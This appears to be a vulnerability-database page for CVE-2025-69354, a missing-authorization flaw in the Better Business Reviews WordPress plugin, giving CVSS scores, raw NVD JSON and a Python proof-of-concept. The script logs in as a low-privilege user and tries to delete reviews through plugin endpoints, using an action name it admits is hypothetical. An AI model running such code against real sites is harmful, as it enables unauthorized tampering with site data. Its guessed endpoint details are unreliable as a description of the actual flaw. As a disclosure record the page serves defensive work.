Security Vulnerability Report
中文
CVE-2025-69354 CVSS 4.3 MEDIUM

CVE-2025-69354

Published: 2026-01-06 17:15:48
Last Modified: 2026-04-27 19:16:42

Description

Missing Authorization vulnerability in BBR Plugins Better Business Reviews better-business-reviews allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Better Business Reviews: from n/a through <= 0.1.1.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Better Business Reviews <= 0.1.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2025-69354 PoC - Better Business Reviews Broken Access Control Note: This is a conceptual PoC for educational purposes only. """ import requests TARGET_URL = "https://vulnerable-site.com" USERNAME = "low_privilege_user" PASSWORD = "user_password" def exploit_cve_2025_69354(): """ Exploit Missing Authorization vulnerability in Better Business Reviews plugin. The plugin fails to properly verify user permissions before allowing access to sensitive functions. """ session = requests.Session() # Step 1: Login with low privilege account login_url = f"{TARGET_URL}/wp-login.php" login_data = { 'log': USERNAME, 'pwd': PASSWORD, 'wp-submit': 'Log In' } session.post(login_url, data=login_data) # Step 2: Identify plugin's admin/post endpoints # The plugin may have AJAX handlers or REST API endpoints without proper capability checks plugin_endpoints = [ f"{TARGET_URL}/wp-admin/admin-ajax.php", f"{TARGET_URL}/wp-json/better-business-reviews/v1/" ] # Step 3: Attempt to access/modify protected data with low privilege account # Example: Access review management functions headers = { 'Content-Type': 'application/json', 'X-WP-Nonce': '' # May be missing or not properly validated } # Sensitive operations that should require admin privileges: # - Delete reviews # - Modify review status # - Access aggregated review data for endpoint in plugin_endpoints: # Attempt to trigger vulnerable function payload = { 'action': 'bbr_delete_review', # Hypothetical action name 'review_id': 1 } response = session.post(endpoint, data=payload, headers=headers) if response.status_code == 200: print(f"[!] Potential vulnerability confirmed at {endpoint}") print(f"Response: {response.text}") if __name__ == "__main__": print("CVE-2025-69354 PoC - Educational Use Only") exploit_cve_2025_69354()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-69354", "sourceIdentifier": "[email protected]", "published": "2026-01-06T17:15:47.963", "lastModified": "2026-04-27T19:16:41.883", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in BBR Plugins Better Business Reviews better-business-reviews allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Better Business Reviews: from n/a through <= 0.1.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/better-business-reviews/vulnerability/wordpress-better-business-reviews-plugin-0-1-1-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}